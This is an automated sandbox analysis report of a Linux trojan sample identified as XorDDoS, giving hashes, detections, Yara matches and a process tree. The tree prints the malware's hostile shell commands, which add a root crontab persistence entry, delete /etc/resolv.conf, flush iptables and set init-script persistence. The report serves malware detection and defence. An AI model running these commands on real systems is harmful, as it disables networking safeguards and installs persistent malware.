Loading ...

Play interactive tourEdit tour

Linux Analysis Report HuuyISbqrL

Overview

General Information

Sample Name:HuuyISbqrL
Analysis ID:519576
MD5:f29045435920698fbbe67b121e7bfe79
SHA1:22b027d1bef58216b0d73ddb755aac259711aa33
SHA256:a07cd4589f01b49d0c349d73a6da0eec0e8c28c82b31bd637b2ee7ff612ad39b
Tags:32elfintel
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sample tries to persist itself using System V runlevels
Machine Learning detection for dropped file
Sample tries to persist itself using cron
Drops files in suspicious directories
Sample deletes itself
Drops invisible ELF files
Machine Learning detection for sample
Writes ELF files to disk
Reads CPU information from /sys indicative of miner or evasive malware
Yara signature match
Writes shell script files to disk
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Sample has stripped symbol table
Executes commands using a shell command-line interpreter
Executes the "rm" command used to delete files or directories
Executes the "touch" command used to create files or modify time stamps
Writes shell script file to disk with an unusual file extension

Classification

Analysis Advice

All HTTP servers contacted by the sample do not answer. Likely the sample is an old dropper which does no longer work

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:519576
Start date:10.11.2021
Start time:22:29:12
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 15s
Hypervisor based Inspection enabled:false
Report type:light
Sample file name:HuuyISbqrL
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal84.troj.evad.lin@0/5@0/0
Warnings:
Show All
  • VT rate limit hit for: dropped/.chinaz{16365833950.12.dr

Process Tree

  • system is lnxubuntu20
  • HuuyISbqrL (PID: 5249, Parent: 5120, MD5: f29045435920698fbbe67b121e7bfe79) Arguments: /tmp/HuuyISbqrL
    • HuuyISbqrL New Fork (PID: 5250, Parent: 5249)
      • HuuyISbqrL New Fork (PID: 5251, Parent: 5250)
        • HuuyISbqrL New Fork (PID: 5256, Parent: 5251)
          • update-rc.d (PID: 5257, Parent: 1860, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d HuuyISbqrL remove
            • systemctl (PID: 5264, Parent: 5257, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
        • HuuyISbqrL New Fork (PID: 5260, Parent: 5251)
          • update-rc.d (PID: 5261, Parent: 1860, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d .chinaz{1636583395 defaults
            • systemctl (PID: 5267, Parent: 5261, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
        • sh (PID: 5262, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/cron.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/cron.sh' >> /etc/crontab"
          • sh New Fork (PID: 5263, Parent: 5262)
          • sed (PID: 5263, Parent: 5262, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -i /\\/etc\\/cron.hourly\\/cron.sh/d /etc/crontab
        • sh (PID: 5265, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf /etc/resolv.conf"
          • sh New Fork (PID: 5266, Parent: 5265)
          • rm (PID: 5266, Parent: 5265, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /etc/resolv.conf
        • sh (PID: 5270, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c whoami
          • sh New Fork (PID: 5275, Parent: 5270)
          • whoami (PID: 5275, Parent: 5270, MD5: dbc1888ae50bb5d4d9a7a210d51be710) Arguments: whoami
        • sh (PID: 5271, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables --flush"
          • sh New Fork (PID: 5273, Parent: 5271)
          • iptables (PID: 5273, Parent: 5271, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables --flush
        • sh (PID: 5272, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c whoami
          • sh New Fork (PID: 5274, Parent: 5272)
          • whoami (PID: 5274, Parent: 5272, MD5: dbc1888ae50bb5d4d9a7a210d51be710) Arguments: whoami
        • sh (PID: 5281, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "touch /home/root/ConfigDatecz"
          • sh New Fork (PID: 5284, Parent: 5281)
          • touch (PID: 5284, Parent: 5281, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch /home/root/ConfigDatecz
        • sh (PID: 5283, Parent: 5251, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "iptables -A OUTPUT -p tcp --dport 0 -j DROP"
          • sh New Fork (PID: 5287, Parent: 5283)
          • iptables (PID: 5287, Parent: 5283, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -A OUTPUT -p tcp --dport 0 -j DROP
  • systemd New Fork (PID: 5282, Parent: 5280)
  • snapd-env-generator (PID: 5282, Parent: 5280, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5291, Parent: 5290)
  • snapd-env-generator (PID: 5291, Parent: 5290, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
HuuyISbqrLCN_disclosed_20180208_lslsDetects malware from disclosed CN malware setFlorian Roth
  • 0xf5ef0:$x1: User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Dropped Files

SourceRuleDescriptionAuthorStrings
/etc/init.d/.chinaz{1636583395CN_disclosed_20180208_lslsDetects malware from disclosed CN malware setFlorian Roth
  • 0xf5ef0:$x1: User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Memory Dumps

SourceRuleDescriptionAuthorStrings
5254.1.000000001a887bdc.00000000078f03a4.r-x.sdmpCN_disclosed_20180208_lslsDetects malware from disclosed CN malware setFlorian Roth
  • 0xf5ef0:$x1: User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
5260.1.000000001a887bdc.00000000078f03a4.r-x.sdmpCN_disclosed_20180208_lslsDetects malware from disclosed CN malware setFlorian Roth
  • 0xf5ef0:$x1: User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
5250.1.000000001a887bdc.00000000078f03a4.r-x.sdmpCN_disclosed_20180208_lslsDetects malware from disclosed CN malware setFlorian Roth
  • 0xf5ef0:$x1: User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
5259.1.000000001a887bdc.00000000078f03a4.r-x.sdmpCN_disclosed_20180208_lslsDetects malware from disclosed CN malware setFlorian Roth
  • 0xf5ef0:$x1: User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
5256.1.000000001a887bdc.00000000078f03a4.r-x.sdmpCN_disclosed_20180208_lslsDetects malware from disclosed CN malware setFlorian Roth
  • 0xf5ef0:$x1: User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Click to see the 4 entries

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: HuuyISbqrLVirustotal: Detection: 54%Perma Link
Source: HuuyISbqrLReversingLabs: Detection: 73%
Machine Learning detection for dropped fileShow sources
Source: /etc/init.d/.chinaz{1636583395Joe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: HuuyISbqrLJoe Sandbox ML: detected
Source: /tmp/HuuyISbqrL (PID: 5251)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: HuuyISbqrL, 5249.1.000000001a887bdc.00000000078f03a4.r-x.sdmpString found in binary or memory: http://www.gnu.org/software/libc/bugs.html

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: HuuyISbqrL, type: SAMPLEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 5254.1.000000001a887bdc.00000000078f03a4.r-x.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 5260.1.000000001a887bdc.00000000078f03a4.r-x.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 5250.1.000000001a887bdc.00000000078f03a4.r-x.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 5259.1.000000001a887bdc.00000000078f03a4.r-x.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 5256.1.000000001a887bdc.00000000078f03a4.r-x.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 5249.1.000000001a887bdc.00000000078f03a4.r-x.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 5258.1.000000001a887bdc.00000000078f03a4.r-x.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 5251.1.000000001a887bdc.00000000078f03a4.r-x.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 5255.1.000000001a887bdc.00000000078f03a4.r-x.sdmp, type: MEMORYMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: /etc/init.d/.chinaz{1636583395, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: HuuyISbqrL, type: SAMPLEMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5254.1.000000001a887bdc.00000000078f03a4.r-x.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5260.1.000000001a887bdc.00000000078f03a4.r-x.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5250.1.000000001a887bdc.00000000078f03a4.r-x.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5259.1.000000001a887bdc.00000000078f03a4.r-x.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5256.1.000000001a887bdc.00000000078f03a4.r-x.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5249.1.000000001a887bdc.00000000078f03a4.r-x.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5258.1.000000001a887bdc.00000000078f03a4.r-x.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5251.1.000000001a887bdc.00000000078f03a4.r-x.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5255.1.000000001a887bdc.00000000078f03a4.r-x.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: /etc/init.d/.chinaz{1636583395, type: DROPPEDMatched rule: CN_disclosed_20180208_lsls date = 2018-02-08, hash1 = 94c6a92984df9ed255f4c644261b01c4e255acbe32ddfd0debe38b558f29a6c9, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: ELF static info symbol of initial sample.symtab present: no
Source: HuuyISbqrLJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
Source: classification engineClassification label: mal84.troj.evad.lin@0/5@0/0

Persistence and Installation Behavior:

barindex
Sample tries to persist itself using System V runlevelsShow sources
Source: /tmp/HuuyISbqrL (PID: 5251)File: /etc/rc1.d/S90.chinaz{1636583395 -> /etc/init.d/.chinaz{1636583395Jump to behavior
Source: /tmp/HuuyISbqrL (PID: 5251)File: /etc/rc2.d/S90.chinaz{1636583395 -> /etc/init.d/.chinaz{1636583395Jump to behavior
Source: /tmp/HuuyISbqrL (PID: 5251)File: /etc/rc3.d/S90.chinaz{1636583395 -> /etc/init.d/.chinaz{1636583395Jump to behavior
Source: /tmp/HuuyISbqrL (PID: 5251)File: /etc/rc4.d/S90.chinaz{1636583395 -> /etc/init.d/.chinaz{1636583395Jump to behavior
Source: /tmp/HuuyISbqrL (PID: 5251)File: /etc/rc5.d/S90.chinaz{1636583395 -> /etc/init.d/.chinaz{1636583395Jump to behavior
Source: /tmp/HuuyISbqrL (PID: 5251)File: /etc/rc.d/rc1.d/S90.chinaz{1636583395 -> /etc/init.d/.chinaz{1636583395Jump to behavior
Source: /tmp/HuuyISbqrL (PID: 5251)File: /etc/rc.d/rc2.d/S90.chinaz{1636583395 -> /etc/init.d/.chinaz{1636583395Jump to behavior
Source: /tmp/HuuyISbqrL (PID: 5251)File: /etc/rc.d/rc3.d/S90.chinaz{1636583395 -> /etc/init.d/.chinaz{1636583395Jump to behavior
Source: /tmp/HuuyISbqrL (PID: 5251)File: /etc/rc.d/rc4.d/S90.chinaz{1636583395 -> /etc/init.d/.chinaz{1636583395Jump to behavior
Source: /tmp/HuuyISbqrL (PID: 5251)File: /etc/rc.d/rc5.d/S90.chinaz{1636583395 -> /etc/init.d/.chinaz{1636583395Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5261)File: /etc/rc1.d/S01.chinaz{1636583395 -> ../init.d/.chinaz{1636583395Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5261)File: /etc/rc2.d/S01.chinaz{1636583395 -> ../init.d/.chinaz{1636583395Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5261)File: /etc/rc3.d/S01.chinaz{1636583395 -> ../init.d/.chinaz{1636583395Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5261)File: /etc/rc4.d/S01.chinaz{1636583395 -> ../init.d/.chinaz{1636583395Jump to behavior
Source: /usr/sbin/update-rc.d (PID: 5261)File: /etc/rc5.d/S01.chinaz{1636583395 -> ../init.d/.chinaz{1636583395Jump to behavior
Sample tries to persist itself using cronShow sources
Source: /tmp/HuuyISbqrL (PID: 5251)File: /etc/cron.hourly/cron.shJump to behavior
Source: /usr/bin/sed (PID: 5263)File: /etc/crontabJump to behavior
Source: /tmp/HuuyISbqrL (PID: 5251)File written: /tmp/.chinaz{1636583395Jump to dropped file
Source: /tmp/HuuyISbqrL (PID: 5251)Shell script file created: /etc/cron.hourly/cron.shJump to dropped file
Source: /tmp/HuuyISbqrL (PID: 5251)Reads from proc file: /proc/meminfoJump to behavior
Source: /tmp/HuuyISbqrL (PID: 5262)Shell command executed: sh -c "sed -i '/\\/etc\\/cron.hourly\\/cron.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/cron.sh' >> /etc/crontab"
Source: /tmp/HuuyISbqrL (PID: 5265)Shell command executed: sh -c "rm -rf /etc/resolv.conf"
Source: /tmp/HuuyISbqrL (PID: 5270)Shell command executed: sh -c whoami
Source: /tmp/HuuyISbqrL (PID: 5271)Shell command executed: sh -c "iptables --flush"
Source: /tmp/HuuyISbqrL (PID: 5272)Shell command executed: sh -c whoami
Source: /tmp/HuuyISbqrL (PID: 5281)Shell command executed: sh -c "touch /home/root/ConfigDatecz"
Source: /tmp/HuuyISbqrL (PID: 5283)Shell command executed: sh -c "iptables -A OUTPUT -p tcp --dport 0 -j DROP"
Source: /bin/sh (PID: 5266)Rm executable: /usr/bin/rm -> rm -rf /etc/resolv.conf
Source: /bin/sh (PID: 5284)Touch executable: /usr/bin/touch -> touch /home/root/ConfigDatecz
Source: /tmp/HuuyISbqrL (PID: 5251)Writes shell script file to disk with an unusual file extension: /etc/init.d/.chinaz{1636583395Jump to dropped file
Source: /bin/sh (PID: 5263)Sed executable: /usr/bin/sed -> sed -i /\\/etc\\/cron.hourly\\/cron.sh/d /etc/crontab

Hooking and other Techniques for Hiding and Protection:

barindex
Drops files in suspicious directoriesShow sources
Source: /tmp/HuuyISbqrL (PID: 5251)File: /etc/init.d/.chinaz{1636583395Jump to dropped file
Sample deletes itselfShow sources
Source: /tmp/HuuyISbqrL (PID: 5251)File: /tmp/HuuyISbqrLJump to behavior
Drops invisible ELF filesShow sources
Source: /tmp/HuuyISbqrL (PID: 5251)ELF file: /tmp/.chinaz{1636583395Jump to dropped file
Source: /tmp/HuuyISbqrL (PID: 5251)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /tmp/HuuyISbqrL (PID: 5249)Queries kernel information via 'uname':
Source: /tmp/HuuyISbqrL (PID: 5251)Queries kernel information via 'uname':

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter1At (Linux)2At (Linux)2Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting2Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting2LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)2Logon Script (Windows)Logon Script (Windows)Hidden Files and Directories1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Indicator Removal on Host1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptFile Deletion11LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 519576 Sample: HuuyISbqrL Startdate: 10/11/2021 Architecture: LINUX Score: 84 56 109.202.202.202, 80 INIT7CH Switzerland 2->56 58 91.189.91.42, 443 CANONICAL-ASGB United Kingdom 2->58 60 91.189.91.43, 443 CANONICAL-ASGB United Kingdom 2->60 62 Malicious sample detected (through community Yara rule) 2->62 64 Multi AV Scanner detection for submitted file 2->64 66 Machine Learning detection for sample 2->66 68 Machine Learning detection for dropped file 2->68 11 HuuyISbqrL 2->11         started        13 systemd snapd-env-generator 2->13         started        15 systemd snapd-env-generator 2->15         started        signatures3 process4 process5 17 HuuyISbqrL 11->17         started        process6 19 HuuyISbqrL 17->19         started        file7 50 /tmp/.chinaz{1636583395, ELF 19->50 dropped 52 /etc/init.d/.chinaz{1636583395, POSIX 19->52 dropped 54 /etc/cron.hourly/cron.sh, POSIX 19->54 dropped 70 Drops invisible ELF files 19->70 72 Drops files in suspicious directories 19->72 74 Sample deletes itself 19->74 76 2 other signatures 19->76 23 HuuyISbqrL 19->23         started        25 HuuyISbqrL sh 19->25         started        27 HuuyISbqrL 19->27         started        29 8 other processes 19->29 signatures8 process9 process10 31 HuuyISbqrL update-rc.d 23->31         started        34 sh sed 25->34         started        36 HuuyISbqrL update-rc.d 27->36         started        38 sh rm 29->38         started        40 sh iptables 29->40         started        42 sh whoami 29->42         started        44 5 other processes 29->44 signatures11 78 Sample tries to persist itself using System V runlevels 31->78 46 update-rc.d systemctl 31->46         started        80 Sample tries to persist itself using cron 34->80 48 update-rc.d systemctl 36->48         started        process12

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
HuuyISbqrL54%VirustotalBrowse
HuuyISbqrL73%ReversingLabsLinux.Trojan.XorDDoS
HuuyISbqrL100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
/etc/init.d/.chinaz{1636583395100%Joe Sandbox ML
/etc/cron.hourly/cron.sh5%VirustotalBrowse
/etc/cron.hourly/cron.sh11%MetadefenderBrowse
/etc/cron.hourly/cron.sh18%ReversingLabsLinux.Trojan.XorDDoS
/tmp/.chinaz{163658339573%ReversingLabsLinux.Trojan.XorDDoS

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.gnu.org/software/libc/bugs.htmlHuuyISbqrL, 5249.1.000000001a887bdc.00000000078f03a4.r-x.sdmpfalse
    high

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    109.202.202.202
    unknownSwitzerland
    13030INIT7CHfalse
    91.189.91.43
    unknownUnited Kingdom
    41231CANONICAL-ASGBfalse
    91.189.91.42
    unknownUnited Kingdom
    41231CANONICAL-ASGBfalse


    Runtime Messages

    Command:/tmp/HuuyISbqrL
    Exit Code:0
    Exit Code Info:
    Killed:False
    Standard Output:

    Standard Error:

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    109.202.202.202jg7QoCfLt9Get hashmaliciousBrowse
      6fY7B26kxlGet hashmaliciousBrowse
        XifGReFMVHGet hashmaliciousBrowse
          7AqQ8f7JW9Get hashmaliciousBrowse
            p67fy5fGRqGet hashmaliciousBrowse
              Akuryo.0curlGet hashmaliciousBrowse
                7Rbcfd7SY6Get hashmaliciousBrowse
                  ptyGet hashmaliciousBrowse
                    uW2ZTbN5heGet hashmaliciousBrowse
                      UepSHkC2XfGet hashmaliciousBrowse
                        OGQrtAf7KPGet hashmaliciousBrowse
                          GUqOv3bL5dGet hashmaliciousBrowse
                            NR882H5GR7Get hashmaliciousBrowse
                              RiK1IzVe2XGet hashmaliciousBrowse
                                aWZ2hz8omMGet hashmaliciousBrowse
                                  tQquJRZ7g7Get hashmaliciousBrowse
                                    wbpnDWBtzxGet hashmaliciousBrowse
                                      OqWVsqYanQGet hashmaliciousBrowse
                                        VMdqUErQGQGet hashmaliciousBrowse
                                          m-i.p-s.SakuraGet hashmaliciousBrowse
                                            91.189.91.43jg7QoCfLt9Get hashmaliciousBrowse
                                              6fY7B26kxlGet hashmaliciousBrowse
                                                XifGReFMVHGet hashmaliciousBrowse
                                                  7AqQ8f7JW9Get hashmaliciousBrowse
                                                    p67fy5fGRqGet hashmaliciousBrowse
                                                      Akuryo.0curlGet hashmaliciousBrowse
                                                        7Rbcfd7SY6Get hashmaliciousBrowse
                                                          ptyGet hashmaliciousBrowse
                                                            uW2ZTbN5heGet hashmaliciousBrowse
                                                              UepSHkC2XfGet hashmaliciousBrowse
                                                                OGQrtAf7KPGet hashmaliciousBrowse
                                                                  GUqOv3bL5dGet hashmaliciousBrowse
                                                                    NR882H5GR7Get hashmaliciousBrowse
                                                                      RiK1IzVe2XGet hashmaliciousBrowse
                                                                        aWZ2hz8omMGet hashmaliciousBrowse
                                                                          tQquJRZ7g7Get hashmaliciousBrowse
                                                                            wbpnDWBtzxGet hashmaliciousBrowse
                                                                              OqWVsqYanQGet hashmaliciousBrowse
                                                                                VMdqUErQGQGet hashmaliciousBrowse
                                                                                  m-i.p-s.SakuraGet hashmaliciousBrowse
                                                                                    91.189.91.42jg7QoCfLt9Get hashmaliciousBrowse
                                                                                      6fY7B26kxlGet hashmaliciousBrowse
                                                                                        XifGReFMVHGet hashmaliciousBrowse
                                                                                          7AqQ8f7JW9Get hashmaliciousBrowse
                                                                                            p67fy5fGRqGet hashmaliciousBrowse
                                                                                              Akuryo.0curlGet hashmaliciousBrowse
                                                                                                7Rbcfd7SY6Get hashmaliciousBrowse
                                                                                                  ptyGet hashmaliciousBrowse
                                                                                                    uW2ZTbN5heGet hashmaliciousBrowse
                                                                                                      UepSHkC2XfGet hashmaliciousBrowse
                                                                                                        OGQrtAf7KPGet hashmaliciousBrowse
                                                                                                          GUqOv3bL5dGet hashmaliciousBrowse
                                                                                                            NR882H5GR7Get hashmaliciousBrowse
                                                                                                              RiK1IzVe2XGet hashmaliciousBrowse
                                                                                                                aWZ2hz8omMGet hashmaliciousBrowse
                                                                                                                  tQquJRZ7g7Get hashmaliciousBrowse
                                                                                                                    wbpnDWBtzxGet hashmaliciousBrowse
                                                                                                                      OqWVsqYanQGet hashmaliciousBrowse
                                                                                                                        VMdqUErQGQGet hashmaliciousBrowse
                                                                                                                          m-i.p-s.SakuraGet hashmaliciousBrowse

                                                                                                                            Domains

                                                                                                                            No context

                                                                                                                            ASN

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                            CANONICAL-ASGBjg7QoCfLt9Get hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            6fY7B26kxlGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            XifGReFMVHGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            7AqQ8f7JW9Get hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            p67fy5fGRqGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
                                                                                                                            Akuryo.0curlGet hashmaliciousBrowse
                                                                                                                            • 91.189.91.42
